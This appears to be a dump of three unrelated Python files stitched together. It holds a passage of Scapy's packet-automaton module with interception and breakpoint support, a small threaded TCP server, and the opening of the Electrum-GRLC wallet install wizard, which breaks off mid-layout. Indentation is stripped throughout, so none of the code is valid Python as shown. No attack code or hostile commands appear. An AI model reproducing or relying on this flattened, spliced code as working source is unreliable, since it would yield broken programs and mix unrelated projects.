Select SelectableObject objects.
inputs: objects to process
remain: timeout. If 0, return [].
customTypes: types of the objects that have the check_recv function.
"""
def _release_all(self):
"""Releases all locks to kill all threads"""
for i in self.inputs:
i.call_release(True)
self.available_lock.release()
def _timeout_thread(self, remain):
"""Timeout before releasing every thing, if nothing was returned"""
time.sleep(remain)
if not self._ended:
self._ended = True
self._release_all()
def _exit_door(self, _input):
"""This function is passed to each SelectableObject as a callback
The SelectableObjects have to call it once there are ready"""
self.results.append(_input)
if self._ended:
return
self._ended = True
self._release_all()
def __init__(self, inputs, remain):
self.results = []
self.inputs = list(inputs)
self.remain = remain
self.available_lock = threading.Lock()
self.available_lock.acquire()
self._ended = False
def process(self):
"""Entry point of SelectableSelector"""
if WINDOWS:
select_inputs = []
for i in self.inputs:
if not isinstance(i, SelectableObject):
warning("Unknown ignored object type: %s", type(i))
elif i.__selectable_force_select__:
# Then use select.select
select_inputs.append(i)
elif not self.remain and i.check_recv():
self.results.append(i)
elif self.remain:
i.wait_return(self._exit_door)
if select_inputs:
# Use default select function
self.results.extend(select(select_inputs, [], [], self.remain)[0]) # noqa: E501
if not self.remain:
return self.results
threading.Thread(target=self._timeout_thread, args=(self.remain,)).start() # noqa: E501
if not self._ended:
self.available_lock.acquire()
return self.results
else:
r, _, _ = select(self.inputs, [], [], self.remain)
return r
def select_objects(inputs, remain):
"""
Select SelectableObject objects. Same than:
``select.select([inputs], [], [], remain)``
But also works on Windows, only on SelectableObject.
:param inputs: objects to process
:param remain: timeout. If 0, return [].
"""
handler = SelectableSelector(inputs, remain)
return handler.process()
class ObjectPipe(SelectableObject):
read_allowed_exceptions = ()
def __init__(self):
self.closed = False
self.rd, self.wr = os.pipe()
self.queue = deque()
SelectableObject.__init__(self)
def fileno(self):
return self.rd
def check_recv(self):
return len(self.queue) > 0
def send(self, obj):
self.queue.append(obj)
os.write(self.wr, b"X")
self.call_release()
def write(self, obj):
self.send(obj)
def recv(self, n=0):
if self.closed:
if self.check_recv():
return self.queue.popleft()
return None
os.read(self.rd, 1)
return self.queue.popleft()
def read(self, n=0):
return self.recv(n)
def close(self):
if not self.closed:
self.closed = True
os.close(self.rd)
os.close(self.wr)
self.queue.clear()
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
# Only handle ObjectPipes
results = []
for s in sockets:
if s.closed:
results.append(s)
if results:
return results, None
return select_objects(sockets, remain), None
class Message:
def __init__(self, **args):
self.__dict__.update(args)
def __repr__(self):
return "<Message %s>" % " ".join("%s=%r" % (k, v)
for (k, v) in six.iteritems(self.__dict__) # noqa: E501
if not k.startswith("_"))
class _instance_state:
def __init__(self, instance):
self.__self__ = instance.__self__
self.__func__ = instance.__func__
self.__self__.__class__ = instance.__self__.__class__
def __getattr__(self, attr):
return getattr(self.__func__, attr)
def __call__(self, *args, **kargs):
return self.__func__(self.__self__, *args, **kargs)
def breaks(self):
return self.__self__.add_breakpoints(self.__func__)
def intercepts(self):
return self.__self__.add_interception_points(self.__func__)
def unbreaks(self):
return self.__self__.remove_breakpoints(self.__func__)
def unintercepts(self):
return self.__self__.remove_interception_points(self.__func__)
##############
# Automata #
##############
class ATMT:
STATE = "State"
ACTION = "Action"
CONDITION = "Condition"
RECV = "Receive condition"
TIMEOUT = "Timeout condition"
IOEVENT = "I/O event"
class NewStateRequested(Exception):
def __init__(self, state_func, automaton, *args, **kargs):
self.func = state_func
self.state = state_func.atmt_state
self.initial = state_func.atmt_initial
self.error = state_func.atmt_error
self.final = state_func.atmt_final
Exception.__init__(self, "Request state [%s]" % self.state)
self.automaton = automaton
self.args = args
self.kargs = kargs
self.action_parameters() # init action parameters
def action_parameters(self, *args, **kargs):
self.action_args = args
self.action_kargs = kargs
return self
def run(self):
return self.func(self.automaton, *self.args, **self.kargs)
def __repr__(self):
return "NewStateRequested(%s)" % self.state
@staticmethod
def state(initial=0, final=0, error=0):
def deco(f, initial=initial, final=final):
f.atmt_type = ATMT.STATE
f.atmt_state = f.__name__
f.atmt_initial = initial
f.atmt_final = final
f.atmt_error = error
def state_wrapper(self, *args, **kargs):
return ATMT.NewStateRequested(f, self, *args, **kargs)
state_wrapper.__name__ = "%s_wrapper" % f.__name__
state_wrapper.atmt_type = ATMT.STATE
state_wrapper.atmt_state = f.__name__
state_wrapper.atmt_initial = initial
state_wrapper.atmt_final = final
state_wrapper.atmt_error = error
state_wrapper.atmt_origfunc = f
return state_wrapper
return deco
@staticmethod
def action(cond, prio=0):
def deco(f, cond=cond):
if not hasattr(f, "atmt_type"):
f.atmt_cond = {}
f.atmt_type = ATMT.ACTION
f.atmt_cond[cond.atmt_condname] = prio
return f
return deco
@staticmethod
def condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.CONDITION
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def receive_condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.RECV
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def ioevent(state, name, prio=0, as_supersocket=None):
def deco(f, state=state):
f.atmt_type = ATMT.IOEVENT
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_ioname = name
f.atmt_prio = prio
f.atmt_as_supersocket = as_supersocket
return f
return deco
@staticmethod
def timeout(state, timeout):
def deco(f, state=state, timeout=timeout):
f.atmt_type = ATMT.TIMEOUT
f.atmt_state = state.atmt_state
f.atmt_timeout = timeout
f.atmt_condname = f.__name__
return f
return deco
class _ATMT_Command:
RUN = "RUN"
NEXT = "NEXT"
FREEZE = "FREEZE"
STOP = "STOP"
END = "END"
EXCEPTION = "EXCEPTION"
SINGLESTEP = "SINGLESTEP"
BREAKPOINT = "BREAKPOINT"
INTERCEPT = "INTERCEPT"
ACCEPT = "ACCEPT"
REPLACE = "REPLACE"
REJECT = "REJECT"
class _ATMT_supersocket(SuperSocket, SelectableObject):
def __init__(self, name, ioevent, automaton, proto, *args, **kargs):
SelectableObject.__init__(self)
self.name = name
self.ioevent = ioevent
self.proto = proto
# write, read
self.spa, self.spb = ObjectPipe(), ObjectPipe()
# Register recv hook
self.spb.register_hook(self.call_release)
kargs["external_fd"] = {ioevent: (self.spa, self.spb)}
self.atmt = automaton(*args, **kargs)
self.atmt.runbg()
def fileno(self):
return self.spb.fileno()
def send(self, s):
if not isinstance(s, bytes):
s = bytes(s)
return self.spa.send(s)
def check_recv(self):
return self.spb.check_recv()
def recv(self, n=MTU):
r = self.spb.recv(n)
if self.proto is not None:
r = self.proto(r)
return r
def close(self):
if not self.closed:
self.atmt.stop()
self.spa.close()
self.spb.close()
self.closed = True
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
return select_objects(sockets, remain), None
class _ATMT_to_supersocket:
def __init__(self, name, ioevent, automaton):
self.name = name
self.ioevent = ioevent
self.automaton = automaton
def __call__(self, proto, *args, **kargs):
return _ATMT_supersocket(
self.name, self.ioevent, self.automaton,
proto, *args, **kargs
)
class Automaton_metaclass(type):
def __new__(cls, name, bases, dct):
cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct)
cls.states = {}
cls.state = None
cls.recv_conditions = {}
cls.conditions = {}
cls.ioevents = {}
cls.timeout = {}
cls.actions = {}
cls.initial_states = []
cls.ionames = []
cls.iosupersockets = []
members = {}
classes = [cls]
while classes:
c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501
classes += list(c.__bases__)
for k, v in six.iteritems(c.__dict__):
if k not in members:
members[k] = v
decorated = [v for v in six.itervalues(members)
if isinstance(v, types.FunctionType) and hasattr(v, "atmt_type")] # noqa: E501
for m in decorated:
if m.atmt_type == ATMT.STATE:
s = m.atmt_state
cls.states[s] = m
cls.recv_conditions[s] = []
cls.ioevents[s] = []
cls.conditions[s] = []
cls.timeout[s] = []
if m.atmt_initial:
cls.initial_states.append(m)
elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501
cls.actions[m.atmt_condname] = []
for m in decorated:
if m.atmt_type == ATMT.CONDITION:
cls.conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.RECV:
cls.recv_conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.IOEVENT:
cls.ioevents[m.atmt_state].append(m)
cls.ionames.append(m.atmt_ioname)
if m.atmt_as_supersocket is not None:
cls.iosupersockets.append(m)
elif m.atmt_type == ATMT.TIMEOUT:
cls.timeout[m.atmt_state].append((m.atmt_timeout, m))
elif m.atmt_type == ATMT.ACTION:
for c in m.atmt_cond:
cls.actions[c].append(m)
for v in six.itervalues(cls.timeout):
v.sort(key=lambda x: x[0])
v.append((None, None))
for v in itertools.chain(six.itervalues(cls.conditions),
six.itervalues(cls.recv_conditions),
six.itervalues(cls.ioevents)):
v.sort(key=lambda x: x.atmt_prio)
for condname, actlst in six.iteritems(cls.actions):
actlst.sort(key=lambda x: x.atmt_cond[condname])
for ioev in cls.iosupersockets:
setattr(cls, ioev.atmt_as_supersocket, _ATMT_to_supersocket(ioev.atmt_as_supersocket, ioev.atmt_ioname, cls)) # noqa: E501
return cls
def build_graph(self):
s = 'digraph "%s" {\n' % self.__class__.__name__
se = "" # Keep initial nodes at the beginning for better rendering
for st in six.itervalues(self.states):
if st.atmt_initial:
se = ('\t"%s" [ style=filled, fillcolor=blue, shape=box, root=true];\n' % st.atmt_state) + se # noqa: E501
elif st.atmt_final:
se += '\t"%s" [ style=filled, fillcolor=green, shape=octagon ];\n' % st.atmt_state # noqa: E501
elif st.atmt_error:
se += '\t"%s" [ style=filled, fillcolor=red, shape=octagon ];\n' % st.atmt_state # noqa: E501
s += se
for st in six.itervalues(self.states):
for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501
if n in self.states:
s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501
for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501
[("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501
[("orange", k, v) for k, v in self.ioevents.items()]):
for f in v:
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = f.atmt_condname
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501
for k, v in six.iteritems(self.timeout):
for t, f in v:
if f is None:
continue
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = "%s/%.1fs" % (f.atmt_condname, t)
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s",color=blue];\n' % (k, n, line) # noqa: E501
s += "}\n"
return s
def graph(self, **kargs):
s = self.build_graph()
return do_graph(s, **kargs)
class Automaton(six.with_metaclass(Automaton_metaclass)):
def parse_args(self, debug=0, store=1, **kargs):
self.debug_level = debug
self.socket_kargs = kargs
self.store_packets = store
def master_filter(self, pkt):
return True
def my_send(self, pkt):
self.send_sock.send(pkt)
# Utility classes and exceptions
class _IO_fdwrapper(SelectableObject):
def __init__(self, rd, wr):
if rd is not None and not isinstance(rd, (int, ObjectPipe)):
rd = rd.fileno()
if wr is not None and not isinstance(wr, (int, ObjectPipe)):
wr = wr.fileno()
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, ObjectPipe):
return self.rd.fileno()
return self.rd
def check_recv(self):
return self.rd.check_recv()
def read(self, n=65535):
if isinstance(self.rd, ObjectPipe):
return self.rd.recv(n)
return os.read(self.rd, n)
def write(self, msg):
self.call_release()
if isinstance(self.wr, ObjectPipe):
self.wr.send(msg)
return
return os.write(self.wr, msg)
def recv(self, n=65535):
return self.read(n)
def send(self, msg):
return self.write(msg)
class _IO_mixer(SelectableObject):
def __init__(self, rd, wr):
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, int):
return self.rd
return self.rd.fileno()
def check_recv(self):
return self.rd.check_recv()
def recv(self, n=None):
return self.rd.recv(n)
def read(self, n=None):
return self.recv(n)
def send(self, msg):
self.wr.send(msg)
return self.call_release()
def write(self, msg):
return self.send(msg)
class AutomatonException(Exception):
def __init__(self, msg, state=None, result=None):
Exception.__init__(self, msg)
self.state = state
self.result = result
class AutomatonError(AutomatonException):
pass
class ErrorState(AutomatonException):
pass
class Stuck(AutomatonException):
pass
class AutomatonStopped(AutomatonException):
pass
class Breakpoint(AutomatonStopped):
pass
class Singlestep(AutomatonStopped):
pass
class InterceptionPoint(AutomatonStopped):
def __init__(self, msg, state=None, result=None, packet=None):
Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501
self.packet = packet
class CommandMessage(AutomatonException):
pass
# Services
def debug(self, lvl, msg):
if self.debug_level >= lvl:
log_interactive.debug(msg)
def send(self, pkt):
if self.state.state in self.interception_points:
self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary())
self.intercepted_packet = pkt
cmd = Message(type=_ATMT_Command.INTERCEPT, state=self.state, pkt=pkt) # noqa: E501
self.cmdout.send(cmd)
cmd = self.cmdin.recv()
self.intercepted_packet = None
if cmd.type == _ATMT_Command.REJECT:
self.debug(3, "INTERCEPT: packet rejected")
return
elif cmd.type == _ATMT_Command.REPLACE:
pkt = cmd.pkt
self.debug(3, "INTERCEPT: packet replaced by: %s" % pkt.summary()) # noqa: E501
elif cmd.type == _ATMT_Command.ACCEPT:
self.debug(3, "INTERCEPT: packet accepted")
else:
raise self.AutomatonError("INTERCEPT: unknown verdict: %r" % cmd.type) # noqa: E501
self.my_send(pkt)
self.debug(3, "SENT : %s" % pkt.summary())
if self.store_packets:
self.packets.append(pkt.copy())
# Internals
def __init__(self, *args, **kargs):
external_fd = kargs.pop("external_fd", {})
self.send_sock_class = kargs.pop("ll", conf.L3socket)
self.recv_sock_class = kargs.pop("recvsock", conf.L2listen)
self.started = threading.Lock()
self.threadid = None
self.breakpointed = None
self.breakpoints = set()
self.interception_points = set()
self.intercepted_packet = None
self.debug_level = 0
self.init_args = args
self.init_kargs = kargs
self.io = type.__new__(type, "IOnamespace", (), {})
self.oi = type.__new__(type, "IOnamespace", (), {})
self.cmdin = ObjectPipe()
self.cmdout = ObjectPipe()
self.ioin = {}
self.ioout = {}
for n in self.ionames:
extfd = external_fd.get(n)
if not isinstance(extfd, tuple):
extfd = (extfd, extfd)
ioin, ioout = extfd
if ioin is None:
ioin = ObjectPipe()
elif not isinstance(ioin, SelectableObject):
ioin = self._IO_fdwrapper(ioin, None)
if ioout is None:
ioout = ObjectPipe()
elif not isinstance(ioout, SelectableObject):
ioout = self._IO_fdwrapper(None, ioout)
self.ioin[n] = ioin
self.ioout[n] = ioout
ioin.ioname = n
ioout.ioname = n
setattr(self.io, n, self._IO_mixer(ioout, ioin))
setattr(self.oi, n, self._IO_mixer(ioin, ioout))
for stname in self.states:
setattr(self, stname,
_instance_state(getattr(self, stname)))
self.start()
def __iter__(self):
return self
def __del__(self):
self.stop()
def _run_condition(self, cond, *args, **kargs):
try:
self.debug(5, "Trying %s [%s]" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
cond(self, *args, **kargs)
except ATMT.NewStateRequested as state_req:
self.debug(2, "%s [%s] taken to state [%s]" % (cond.atmt_type, cond.atmt_condname, state_req.state)) # noqa: E501
if cond.atmt_type == ATMT.RECV:
if self.store_packets:
self.packets.append(args[0])
for action in self.actions[cond.atmt_condname]:
self.debug(2, " + Running action [%s]" % action.__name__)
action(self, *state_req.action_args, **state_req.action_kargs)
raise
except Exception as e:
self.debug(2, "%s [%s] raised exception [%s]" % (cond.atmt_type, cond.atmt_condname, e)) # noqa: E501
raise
else:
self.debug(2, "%s [%s] not taken" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
def _do_start(self, *args, **kargs):
ready = threading.Event()
_t = threading.Thread(target=self._do_control, args=(ready,) + (args), kwargs=kargs) # noqa: E501
_t.setDaemon(True)
_t.start()
ready.wait()
def _do_control(self, ready, *args, **kargs):
with self.started:
self.threadid = threading.currentThread().ident
# Update default parameters
a = args + self.init_args[len(args):]
k = self.init_kargs.copy()
k.update(kargs)
self.parse_args(*a, **k)
# Start the automaton
self.state = self.initial_states[0](self)
self.send_sock = self.send_sock_class(**self.socket_kargs)
self.listen_sock = self.recv_sock_class(**self.socket_kargs)
self.packets = PacketList(name="session[%s]" % self.__class__.__name__) # noqa: E501
singlestep = True
iterator = self._do_iter()
self.debug(3, "Starting control thread [tid=%i]" % self.threadid)
# Sync threads
ready.set()
try:
while True:
c = self.cmdin.recv()
self.debug(5, "Received command %s" % c.type)
if c.type == _ATMT_Command.RUN:
singlestep = False
elif c.type == _ATMT_Command.NEXT:
singlestep = True
elif c.type == _ATMT_Command.FREEZE:
continue
elif c.type == _ATMT_Command.STOP:
break
while True:
state = next(iterator)
if isinstance(state, self.CommandMessage):
break
elif isinstance(state, self.Breakpoint):
c = Message(type=_ATMT_Command.BREAKPOINT, state=state) # noqa: E501
self.cmdout.send(c)
break
if singlestep:
c = Message(type=_ATMT_Command.SINGLESTEP, state=state) # noqa: E501
self.cmdout.send(c)
break
except (StopIteration, RuntimeError):
c = Message(type=_ATMT_Command.END,
result=self.final_state_output)
self.cmdout.send(c)
except Exception as e:
exc_info = sys.exc_info()
self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, traceback.format_exception(*exc_info))) # noqa: E501
m = Message(type=_ATMT_Command.EXCEPTION, exception=e, exc_info=exc_info) # noqa: E501
self.cmdout.send(m)
self.debug(3, "Stopping control thread (tid=%i)" % self.threadid)
self.threadid = None
# Close sockets
self.listen_sock.close()
self.send_sock.close()
def _do_iter(self):
while True:
try:
self.debug(1, "## state=[%s]" % self.state.state)
# Entering a new state. First, call new state function
if self.state.state in self.breakpoints and self.state.state != self.breakpointed: # noqa: E501
self.breakpointed = self.state.state
yield self.Breakpoint("breakpoint triggered on state %s" % self.state.state, # noqa: E501
state=self.state.state)
self.breakpointed = None
state_output = self.state.run()
if self.state.error:
raise self.ErrorState("Reached %s: [%r]" % (self.state.state, state_output), # noqa: E501
result=state_output, state=self.state.state) # noqa: E501
if self.state.final:
self.final_state_output = state_output
return
if state_output is None:
state_output = ()
elif not isinstance(state_output, list):
state_output = state_output,
# Then check immediate conditions
for cond in self.conditions[self.state.state]:
self._run_condition(cond, *state_output)
# If still there and no conditions left, we are stuck!
if (len(self.recv_conditions[self.state.state]) == 0 and
len(self.ioevents[self.state.state]) == 0 and
len(self.timeout[self.state.state]) == 1):
raise self.Stuck("stuck in [%s]" % self.state.state,
state=self.state.state, result=state_output) # noqa: E501
# Finally listen and pay attention to timeouts
expirations = iter(self.timeout[self.state.state])
next_timeout, timeout_func = next(expirations)
t0 = time.time()
fds = [self.cmdin]
if len(self.recv_conditions[self.state.state]) > 0:
fds.append(self.listen_sock)
for ioev in self.ioevents[self.state.state]:
fds.append(self.ioin[ioev.atmt_ioname])
while True:
t = time.time() - t0
if next_timeout is not None:
if next_timeout <= t:
self._run_condition(timeout_func, *state_output)
next_timeout, timeout_func = next(expirations)
if next_timeout is None:
remain = None
else:
remain = next_timeout - t
self.debug(5, "Select on %r" % fds)
r = select_objects(fds, remain)
self.debug(5, "Selected %r" % r)
for fd in r:
self.debug(5, "Looking at %r" % fd)
if fd == self.cmdin:
yield self.CommandMessage("Received command message") # noqa: E501
elif fd == self.listen_sock:
try:
pkt = self.listen_sock.recv(MTU)
except recv_error:
pass
else:
if pkt is not None:
if self.master_filter(pkt):
self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501
for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501
self._run_condition(rcvcond, pkt, *state_output) # noqa: E501
else:
self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501
else:
self.debug(3, "IOEVENT on %s" % fd.ioname)
for ioevt in self.ioevents[self.state.state]:
if ioevt.atmt_ioname == fd.ioname:
self._run_condition(ioevt, fd, *state_output) # noqa: E501
except ATMT.NewStateRequested as state_req:
self.debug(2, "switching from [%s] to [%s]" % (self.state.state, state_req.state)) # noqa: E501
self.state = state_req
yield state_req
# Public API
def add_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.add(ipt)
def remove_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.discard(ipt)
def add_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.add(bp)
def remove_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.discard(bp)
def start(self, *args, **kargs):
if not self.started.locked():
self._do_start(*args, **kargs)
def run(self, resume=None, wait=True):
if resume is None:
resume = Message(type=_ATMT_Command.RUN)
self.cmdin.send(resume)
if wait:
try:
c = self.cmdout.recv()
except KeyboardInterrupt:
self.cmdin.send(Message(type=_ATMT_Command.FREEZE))
return
if c.type == _ATMT_Command.END:
return c.result
elif c.type == _ATMT_Command.INTERCEPT:
raise self.InterceptionPoint("packet intercepted", state=c.state.state, packet=c.pkt) # noqa: E501
elif c.type == _ATMT_Command.SINGLESTEP:
raise self.Singlestep("singlestep state=[%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.BREAKPOINT:
raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.EXCEPTION:
six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2])
def runbg(self, resume=None, wait=False):
self.run(resume, wait)
def next(self):
return self.run(resume=Message(type=_ATMT_Command.NEXT))
__next__ = next
def stop(self):
self.cmdin.send(Message(type=_ATMT_Command.STOP))
with self.started:
# Flush command pipes
while True:
r = select_objects([self.cmdin, self.cmdout], 0)
if not r:
break
for fd in r:
fd.recv()
def restart(self, *args, **kargs):
self.stop()
self.start(*args, **kargs)
def accept_packet(self, pkt=None, wait=False):
rsm = Message()
if pkt is None:
rsm.type = _ATMT_Command.ACCEPT
else:
rsm.type = _ATMT_Command.REPLACE
rsm.pkt = pkt
return self.run(resume=rsm, wait=wait)
def reject_packet(self, wait=False):
rsm = Message(type=_ATMT_Command.REJECT)
return self.run(resume=rsm, wait=wait)
|
server.py
|
import socket
from threading import Thread
from dan_socket.event import Event
from dan_socket.base import BaseConnection
class ClientConnection:
def __init__(self, client_sock, server):
self.client_sock = client_sock
self.server = server
self.handle_connection()
def send(self, message):
self.client_sock.send(message.encode())
def read_loop(self):
while True:
message = self.client_sock.recv(1024)
if len(message) == 0:
break
self.server.event.trigger_event("on_message", self, message)
self.server.connection_closed(self)
def handle_connection(self):
Thread(target=ClientConnection.read_loop, args=(self, )).start()
class DanServer(BaseConnection):
def __init__(self, host, port, protocol="TCP", max_connections=50):
self._sock = socket.socket(socket.AF_INET, BaseConnection.PROTOCOL[protocol])
self._sock.bind((host, port))
self._clients = {}
self.max_connections = max_connections
self.event = Event # it's a class not object
def connection_closed(self, client):
client.client_sock.close()
if client in self._clients:
del self._clients[client]
self.event.trigger_event("on_connection_closed", client)
def start(self):
self._sock.listen(self.max_connections)
while True:
client_sock, address = self._sock.accept()
client = ClientConnection(client_sock, self)
self._clients[client] = address
self.event.trigger_event("on_new_connection", client)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum_grlc.wallet import Wallet, Abstract_Wallet
from electrum_grlc.storage import WalletStorage, StorageReadWriteError
from electrum_grlc.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum_grlc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum_grlc.network import Network
from electrum_grlc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum_grlc.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum_grlc.simple_config import SimpleConfig
from electrum_grlc.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> ltc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-GRLC - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setFocusPolicy(Qt.NoFocus)
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
